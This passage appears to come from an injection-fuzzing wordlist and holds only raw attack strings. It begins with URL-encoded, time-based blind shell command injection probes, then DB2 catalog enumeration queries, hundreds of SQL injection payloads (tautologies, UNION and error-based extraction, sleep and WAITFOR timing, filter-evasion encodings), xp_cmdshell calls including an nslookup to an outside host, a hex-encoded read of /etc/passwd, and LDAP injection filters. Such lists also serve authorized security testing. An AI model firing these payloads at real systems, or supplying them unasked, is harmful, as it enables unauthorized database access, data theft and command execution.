20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JWNHUW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JWNHUW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JWNHUW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JWNHUW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JWNHUW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JWNHUW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JWNHUW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JWNHUW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%0A%20str%3D%24%28echo%20BRBPJX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%0A%20str%3D%24%28echo%20BRBPJX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%0A%20str%3D%24%28echo%20BRBPJX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%0A%20str%3D%24%28echo%20BRBPJX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%0A%20str%3D%24%28echo%20BRBPJX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%0A%20str%3D%24%28echo%20BRBPJX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%0A%20str%3D%24%28echo%20BRBPJX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%0A%20str%3D%24%28echo%20BRBPJX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%0A%20str%3D%24%28echo%20BRBPJX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%3B%20str%3D%24%28echo%20EYUAUR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%3B%20str%3D%24%28echo%20EYUAUR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%3B%20str%3D%24%28echo%20EYUAUR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%3B%20str%3D%24%28echo%20EYUAUR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%3B%20str%3D%24%28echo%20EYUAUR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%3B%20str%3D%24%28echo%20EYUAUR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%3B%20str%3D%24%28echo%20EYUAUR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%3B%20str%3D%24%28echo%20EYUAUR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%3B%20str%3D%24%28echo%20EYUAUR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%7C%20%5B%201%20-ne%20%24%28echo%20MUMUQI%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%7C%20%5B%202%20-ne%20%24%28echo%20MUMUQI%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%7C%20%5B%203%20-ne%20%24%28echo%20MUMUQI%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%7C%20%5B%204%20-ne%20%24%28echo%20MUMUQI%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%7C%20%5B%205%20-ne%20%24%28echo%20MUMUQI%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%7C%20%5B%206%20-ne%20%24%28echo%20MUMUQI%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%7C%20%5B%207%20-ne%20%24%28echo%20MUMUQI%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%7C%20%5B%208%20-ne%20%24%28echo%20MUMUQI%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%7C%20%5B%209%20-ne%20%24%28echo%20MUMUQI%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FDEYNL%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FDEYNL%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FDEYNL%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FDEYNL%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FDEYNL%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FDEYNL%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FDEYNL%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FDEYNL%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FDEYNL%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%0A%20str%3D%24%28echo%20TIKHVB%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%0A%20str%3D%24%28echo%20TIKHVB%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%0A%20str%3D%24%28echo%20TIKHVB%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%0A%20str%3D%24%28echo%20TIKHVB%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%0A%20str%3D%24%28echo%20TIKHVB%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%0A%20str%3D%24%28echo%20TIKHVB%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%0A%20str%3D%24%28echo%20TIKHVB%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%0A%20str%3D%24%28echo%20TIKHVB%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%0A%20str%3D%24%28echo%20TIKHVB%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%20$(echo%20SYCGSY%20>%20SYCGSY.txt)\necho%20$(rm%20SYCGSY.txt%20>%20SYCGSY.txt)\n\nselect versionnumber, version_timestamp from sysibm.sysversions;\nselect user from sysibm.sysdummy1;\nselect session_user from sysibm.sysdummy1;\nselect system_user from sysibm.sysdummy1;\nselect current server from sysibm.sysdummy1;\nselect name from sysibm.systables;\nselect grantee from syscat.dbauth;\nselect * from syscat.tabauth;\nselect * from syscat.dbauth where grantee = current user;\nselect * from syscat.tabauth where grantee = current user;\nselect name, tbname, coltype from sysibm.syscolumns;\nSELECT schemaname FROM syscat.schemata;\n'\na' or 1=1-- \n\"a\"\" or 1=1--\"\n or a = a\na' or 'a' = 'a\n1 or 1=1\n'aNd 1=1\n' anD 1=1\"\n' and 1=(select 1)+'\n'+(SELECT 1)+'\n'+(SELECT 999999)+'\n' OR 'sp'='sp\nsuperbug' AND 'a'='a\n' select dbms_xmlgen.getxml('select \\\"a\\\" from sys.dual') from sys.dual;\n' select+dbms_pipe.receive_message((chr(95)||chr(96)||chr(97))+from+dual)\n' or''='\nsuperbug 'or''='\n' and 1=1\n' and 1=1 'a'='a\n' and 1=1 'a'='a\n' aNd 1=2\n' aNd 1=MID((database()),1,1)>1\n' aNd 2=MID((@@version,1,1)--+\n' aNd 3=MID((@@version,1,1)--+\n' aNd 4=MID((@@version,1,1)--+\n' aNd 5=MID((@@version,1,1)--+\n' or 1=1 --\na' or 1=1 --\n' or 1=1#\nor 1=1 --\n') or ('x'='x\nor username LIKE '%a%\n' or username LIKE '%a%\",\n' HAVING 1=1--\n' and+1=convert(int,@@version)\n' or 1=utl_inaddr.get_host_address((select banner from v$version where rownum=1))--\"\n'a' || 'b' \n' SELECT IF(1=1,'true','false')\n') or ('1'='1--\n' GROUP BY 99999\nif(true=false,1,SLEEP(5))--+\nand+if(true%21=true,1,SLEEP(5))--+\nand+if(1=2,1,SLEEP(5))--+\nif(1%21=1,1,SLEEP(5))--+\nif(true=true,1,SLEEP(5))--+\nif(2=2,1,SLEEP(5))--+\nand+true=false--+\nand+false%21=false--+\nand(select+1+from(select+count(*),floor(rand(0)*2)from+information_schema.tables+group+by+2)a)--+\nunion+select+1,(select+concat(0x53514c69,mid((concat(hex(concat_ws(0x7b257d,version(),database(),user(),CURRENT_USER)),0x69)),1,65536))),1,1--+\n' if(true=false,1,SLEEP(5))--+\n' and+if(true%21=true,1,SLEEP(5))--+\n' and+if(1=2,1,SLEEP(5))--+\n' if(1%21=1,1,SLEEP(5))--+\n' if(true=true,1,SLEEP(5))--+\n' if(2=2,1,SLEEP(5))--+\n' and+true=false--+\n' and+false%21=false--+\n' and(select+1+from(select+count(*),floor(rand(0)*2)from+information_schema.tables+group+by+2)a)--+\n' union+select+1,(select+concat(0x53514c69,mid((concat(hex(concat_ws(0x7b257d,version(),database(),user(),CURRENT_USER)),0x69)),1,65536))),1,1--+\nWAITFOR DELAY '0:0:50';--\"\n'+(SELECT 1 FROM (SELECT SLEEP(50))A)+'\n(SELECT 1 FROM (SELECT SLEEP(50))A)\n1') AND SLEEP(50) AND ('LoUL'='LoUL\"\n' WAITFOR DELAY '0:0:50' and 'a'='a;--\n' and  sleep(50) and  'a'='a\n' WAITFOR DELAY '0:0:50';--\"\n' IF 1=1 THEN dbms_lock.sleep(50);\n' WAITFOR DELAY '0:0:50';--\n; SLEEP(50)\nSLEEP(50)\n' SLEEP(50)--\n' SLEEP(50)\npg_sleep(50)\n' pg_sleep(50)\nPG_DELAY(50)\nand if(substring(user(),1,1)>=chr(97),SLEEP(50),1)--\n' and if(substring(user(),1,1)>=chr(97),SLEEP(50),1)--\nDBMS_LOCK.SLEEP(50);\nAND if not(substring((select @version),25,1) < 52) waitfor delay  '0:0:50'--\n1,'0');waitfor delay '0:0:50;--\n');waitfor delay'0:0:50';--\n);waitfor delay '0:0:50';--\n' and pg_sleep(50)--\n1) and pg_sleep(50)--\n\\\") and pg_sleep(50)--\n') and pg_sleep(50)--\n1)) and pg_sleep(50)--\n)) and pg_sleep(50)--\n')) and pg_sleep(50)--\n\\\")) or pg_sleep(50)--\n')) or pg_sleep(50)--\n' and pg_sleep(50)--\n1) and sleep(50)--\n\\\") and sleep(50)--\n') and sleep(50)--\n1)) and sleep(50)--\n)) and sleep(50)--\n')) and sleep(50)--\n\\\")) or sleep(50)--\n' or pg_sleep(50)--\n')) or sleep(50)--\nare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)\ndeclare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s) \ndeclare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)\ndeclare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)\na'\n?\n' or 1=1\n‘ or 1=1 -- \nx' AND userid IS NULL; -- \nx' AND email IS NULL; -- \nanything' OR 'x'='x\nx' AND 1=(SELECT COUNT(*) FROM tabname); -- \nx' AND members.email IS NULL; -- \nx' OR full_name LIKE '%Bob%\n23 OR 1=1\n'; exec master..xp_cmdshell 'ping 172.10.1.255'-- \n'\n'%20or%20''='\n'%20or%20'x'='x\n%20or%20x=x\n')%20or%20('x'='x\n0 or 1=1\n' or 0=0 -- \n\" or 0=0 -- \nor 0=0 -- \n' OR 1=1 LIMIT 1 #\n' or 0=0 #\n or 0=0 #\"\nor 0=0 #\n' or 1=1-- \n\" or 1=1-- \n' or '1'='1'-- \n' or 1=1 --'\n' or 1 --'\nor 1=1-- \nor%201=1\nor%201=1 -- \n' or 1=1 or ''='\n or 1=1 or \"\"=\n' or a=a-- \n or a=a\n') or ('a'='a\n) or (a=a\nhi or a=a\nhi or 1=1 --\"\nhi' or 1=1 -- \nhi' or 'a'='a\nhi') or ('a'='a\n\"hi\"\") or (\"\"a\"\"=\"\"a\"\n'hi' or 'x'='x';\n@variable\n,@variable\nPRINT\nPRINT @@variable\nselect\ninsert\nas\nor\nprocedure\nlimit\norder by\nasc\ndesc\ndelete\nupdate\ndistinct\nhaving\ntruncate\nreplace\nlike\nhandler\nbfilename\n' or username like '%\n' or uname like '%\n' or userid like '%\n' or uid like '%\n' or user like '%\nexec xp\nexec sp\n'; exec master..xp_cmdshell\n'; exec xp_regread\nt'exec master..xp_cmdshell 'nslookup www.google.com'-- \n--sp_password\n\\x27UNION SELECT\n' UNION SELECT\n' UNION ALL SELECT\n' or (EXISTS)\n' (select top 1\n'||UTL_HTTP.REQUEST\n1;SELECT%20*\nto_timestamp_tz\ntz_offset\n<>\"'%;)(&+\n'%20or%201=1\n%27%20or%201=1\n%20$(sleep%2050)\n%20'sleep%2050'\nchar%4039%41%2b%40SELECT\n&apos;%20OR\n'sqlattempt1\n(sqlattempt2)\n|\n%7C\n*|\n%2A%7C\n*(|(mail=*))\n%2A%28%7C%28mail%3D%2A%29%29\n*(|(objectclass=*))\n%2A%28%7C%28objectclass%3D%2A%29%29\n(\n%28\n)\n%29\n&\n%26\n!\n%21\n' or 1=1 or ''='\n' or ''='\nx' or 1=1 or 'x'='y\n/\n//\n//*\n*/*\na' or 3=3-- \n\"a\"\" or 3=3--\"\n' or 3=3\n‘ or 3=3 -- \nadmin --\nx' AND 1=(SELECT COUNT(*) FROM tabname);--\n1+union+select+abc+from+abc\n'union select 1,load_file(0x2f6574632f706173737764),3 from users--\n0^(locate(0x61,(select id from users where num=1),1)=1)\nx';INSERT+INTO+aa('1')+values('1')--\nx';UPDATE+aa+set+1='2'--\n1+and+convert(int,@@servername)--\na';exec+master..xp_cmdshell+'ping'--\na';EXEC+master.dbo.xp_cmdshell+'ping'\n;/*,1*/ EXEC /*,1*/ master..xp_cmdshell /*,1*/ \"ping 127.0.0.1\" /*,1*/--\n';/*&iid=1*/ EXEC/*&iid=1*/ master..xp_cmdshell /*&iid=1*/ \"ping 127.0.0.1\" /*&iid=1*/--\n'1+or+1=1--\n'1+or+'ab'='ab1\nadmin'--\n'--\nadmin'/*\nadmin'# \n1'<99# \n'=0=1# \n'<=>0# \n'!=2!=3!=4# \n'|0# \n'&0# \n'^0# \n'+and+@@servername>1--\n'+and+@@version>1--\n1'+HAVING 1=1--\n(coalesce(length(load_file(0x2F6574632F706173737764)),1))\nif(if((name)like(0x61646D696E),1,0),if(mid((password),1,1)like(0x61),id,0),0);%00\n(1)rlike(if(mid(@@version,1,1)like(5),0x28,1))\n1),(version(),1,1\n%20union%20/*!select*/%20/*!@@datadir*/\n15+/*!union*/+/*!all*/+/*!select*/+1,2,3,4,5,6,7--\n6+/*!UniOn*/+/*!AlL*/+/*!SeLecT*/+1,2,3,4,5,6,version()--\n1'+and+(select+pass+from+users+limit+1)='pass--\n123+uniOn+SeLEcT+BaNneR+FroM+v$vERsIon+WhERe+ROwNUm=1\nnion/*aaa*/select/*aaa*/1,2,3\nif(substring(USER(),1,4)=0x726f6f74,SLEEP(5),1)\n10+UNION+SELECT+LOAD_FILE(0x2f6574632f706173737764)\n1'&&1='1\n'='\n'+and+(select+substr(group_concat(pass),1,1)+from+users)='a\n1%27%20union%20select%201,2,3--\n123%2527%2520select%2520convert(int,@@servername)--\n53E%4c%45%43T%20%73%63h%65%6d%61%6ea%6de%20%46%52O%4d%20%70g%5f%74a%62%6ce%73\n1++union++select++abc++from++abc\n1%20%20union%20%20select%20%20abc%20%20from%20%20abc\n1%20%20%20%20union%20%20%20%20select%20%20%20%20abc%20%20%20%20from%20%20%20%20abc\n1/*union*/union/*select*/select+1,2,3/*\n1%2520union%2520select%25201,2,3/*\n1%0Aunion%0Aselect%0A1,2,3/*\n1'OR'121'='121\n1'%0Cand%0C''='\n1'%0Cunion%0Cselect%0C1,2,3\n1'%0Band%0B''='\n1'%0Bunion%0Bselect%0B1,2,3\n1'%0Dand%0D''='\n1'%0Dunion%0Dselect%0D1,2,3\nunion(select(version()))\n123/*!or*/1=1;\n1'union/*!select*/pass,load_file(0x11)from+users--\n1 and 9=8 /*!uNiOn*/ aLl /*!sElect*/ 1,2,3--\n1/**/union%a0select/**/1,pass,3`a`from`users`\n1+union+select+1,2,3/*\n1+union+select+1,2,3--\n1+union+select+1,2,3# \n1+union+select+1,2,3;%00\n1+len(@@servername)>1/*\n1+len(@@servername)>1--\n1+len(@@servername)>1# \n1+len(@@servername)>1;%00\n'); exec sp_executesql('W'+'ait'+'for'+' '+'de'+'lay'+' '+'00:00:40');--\n'; EXEC ('SEL' + 'ECT US' + 'ER')\n'; EXECUTE IMMEDIATE  'SEL' || 'ECT US' || 'ER'\n';declare @x varchar(80); set @x = 0x73656c65637420404076657273696f6e; EXEC (@x)\n';DECLARE+@S+NVARCHAR(200);SET+@S=CAST(0x73656c65637420404076657273696f6e+AS+NVARCHAR(200));EXEC(@S);\n1;declare+@myvar+nvarchar(80);set+@myvar=N'UNI'+N'ON%20SEL'+N'ECT%20U'+N'SER');EXEC(@myvar);\nSET @c = CONCAT(b'01010011',b'01100101',b'01001100',b'01100101',b'01100011',b'01110100',' ',b'00110001');PREPARE s FROM @c;EXECUTE s;\nSET @c = CONCAT(_latin1 b'01010011',_latin1 b'01100101',_latin1 b'01001100',_latin1 b'01100101',_latin1 b'01100011',_latin1 b'01110100',' ',_latin1 b'00110001');PREPARE s FROM @c;EXECUTE s;\nSET @c = CONCAT(REPLACE(MAKE_SET(5,'SEL','xxxxx','ECT'), ',', ''),' 1');PREPARE s FROM @c;EXECUTE s;\n23%27%20LIMIT%201%2C1%20UNION%20ALL%20SELECT%20CONCAT%280x3a6e75773a%2C%28CASE%20WHEN%20%286349=6349%2F%2A%2150521%20AND%206349=6350%2A%2F%29%20THEN%201%20ELSE%200%20END%29%2C0x3a6270793a%29%23\n23%27%20LIMIT%201%2C1%20UNION%20ALL%20SELECT%20CONCAT%280x3a6e75773a%2CIFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%2C0x3a6270793a%29%23\n23%EF%BC%87%20LIMIT%201%2C1%20UNION%20ALL%20SELECT%20CONCAT%280x3a757a793a%2CIFNULL%28CAST%28version%28%29%20AS%20CHAR%29%2C0x20%29%2C0x3a736a763a%29%23\n23%27%20LIMIT%201%2C1%20UNION%20ALL%20SELECT%20CONCAT%280x3a757a793a%2CIFNULL%28CAST%28version%28%29%20AS%20CHAR%29%2C0x20%29%2C0x3a736a763a%29%23%00\nMTIzJyBMSU1JVCAxLDEgVU5JT04gQUxMIFNFTEVDVCBDT05DQVQoMHgzYTc1N2E3OTNhLElGTlVMTChDQVNUKHZlcnNpb24oKSBBUyBDSEFSKSwweDIwKSwweDNhNzM2YTc2M2EpIw==\n%27--iXhuMCk%0ALIMIT--MogMpTZGYi%0A1%2C1--TPjIJcnXAuX%0AUNION--llDCqlfYffk%0AALL--AtQHoRbN%0ASELECT--aaoghwWht%0ACONCAT%280x3a7372773a%2CIFNULL%28CAST%28database%28%29--nXGeXoOEyHm%0AAS--tWKPbn%0ACHAR%29%2C0x20%29%2C0x3a6d79643a%29%23\n%31%32%33%27%20%4C%49%4D%49%54%20%31%2C%31%20%55%4E%49%4F%4E%20%41%4C%4C%20%53%45%4C%45%43%54%20%43%4F%4E%43%41%54%28%30%78%33%61%37%33%37%32%37%37%33%61%2C%49%46%4E%55%4C%4C%28%43%41%53%54%28%64%61%74%61%62%61%73%65%28%29%20%41%53%20%43%48%41%52%29%2C%30%78%32%30%29%2C%30%78%33%61%36%64%37%39%36%34%33%61%29%23\n23%27%23DDvIMgC%0ALIMIT%23wyQDiZxbEfWH%0A1%2C1%23vJHSbhW%0AUNION%23WfNzMdJBEP%0AALL%23AgDqJl%0ASELECT%23xRYClbEPoiuX%0ACONCAT%280x3a7372773a%2CIFNULL%28CAST%28version%28%29%23BiJwsArZs%0AAS%23FgnwSFSQ%0ACHAR%29%2C0x20%29%2C0x3a6d79643a%29%23\n23%29%20AND%20%28SELECT%205524%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6864723a%2C%28SELECT%20%28CASE%20WHEN%20%285524%20LIKE%205524%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7767793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%287619%20LIKE%207619\n23%29%20AND%202874%20LIKE%202341%20AND%20%288194%20LIKE%208194\n23%27%20LIMIT%201%2C1%20UNION%20ALL%20SELECT%20CONCAT%280x3a6864723a%2CIF%28ISNULL%28CAST%28version%28%29%20AS%20CHAR%29%29%2C0x20%2CCAST%28version%28%29%20AS%20CHAR%29%29%2C0x3a7767793a%29%23\n23%29%20%20AND%20%20%20%208558=8593%20%20AND%20%20%20%20%285473=5473\n223%29%20%20%20%20AND%20%20%20%20%208558=8593%20%20AND%20%20%20%20%20%20%285473=5473\n323%27%20%20AND%20%20%20%28%20%20SELECT%20%20%20%202937%20%20%20FROM%28%20%20SELECT%20%20%20%20%20COUNT%28%2A%29%2C%20%20CONCAT%280x3a6d70663a%2C%28%20%20SELECT%20%20%20%20MID%28%28%20%20IFNULL%28%20CAST%28%20%20database%28%29%20%20%20AS%20%20%20%20%20%20%20CHAR%20%20%29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a736e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20%20%20%20FROM%20%20%20%20INFORMATION_SCHEMA.CHARACTER_SETS%20%20%20%20GROUP%20%20%20%20%20BY%20%20%20%20x%29a%29%20%20AND%20%20%20%27rmHN%27=%27rmHN\n423%27%20%20%20%20LIMIT%20%20%201%2C1%20%20UNION%20%20%20%20%20ALL%20%20%20%20%20%20%20SELECT%20%20%20%20%20CONCAT%280x3a6d70663a%2C%20IFNULL%28%20CAST%28%20%20database%28%29%20%20%20AS%20%20%20%20%20CHAR%20%29%2C0x20%29%2C0x3a736e623a%29%23\n1##%1%2%3%%27%20%L%I%M%I%T%20%1%%2C%1%20%U%N%I%O%N%20%A%L%L%20%S%E%L%E%C%T%20%C%O%N%C%A%T%%28%0%x%3%a%6%d%7%0%6%6%3%a%%2C%I%F%N%U%L%L%%28%C%A%S%T%%28%d%a%t%a%b%a%s%e%%28%%29%20%A%S%20%C%H%A%R%%29%%2C%0%x%2%0%%29%%2C%0%x%3%a%7%3%6%e%6%2%3%a%%29%%23\n1%1%3%%27%+%A%N%D%+%1%=%1\n23%bf%27%20LIMIT%201%2C1%20UNION%20ALL%20SELECT%20CONCAT%280x3a6d70663a%2CIFNULL%28CAST%28database%28%29%20AS%20CHAR%29%2C0x20%29%2C0x3a736e623a%29%23--%20\n123%27%20LIMIT%201%2C1%20UNION%20ALL%20SELECT%20CONCAT%280x3a6d70663a%2CIFNULL%28CAST%28database%28%29%20AS%20CHAR%29%2C0x20%29%2C0x3a736e623a%29%23%20and%20%270having%27=%270having%27\n223%29%20AND%201701=5451%20AND%20%283835=3835%20and%20%270having%27=%270having%27\n23%27%23mPkKCjceC%0A%23pwsxOHFa%0ALIMIT%23GSTpANJXKGdC%0A%23uOaAVrPY%0A%23IufLHavTgnn%0A%23sRygbynG%0A1%2C1%23uRvizI%0A%23kNTIVAJnz%0AUNION%23IEVjNIbBGg%0A%23CrHaTy%0A%23PkPohIaUPUPP%0A%23ouAusiVKpxg%0A%23UTlHCuTls%0AALL%23ZdLRhsQPAkid%0A%23ObZxIruvjFbd%0A%23IxosRHsT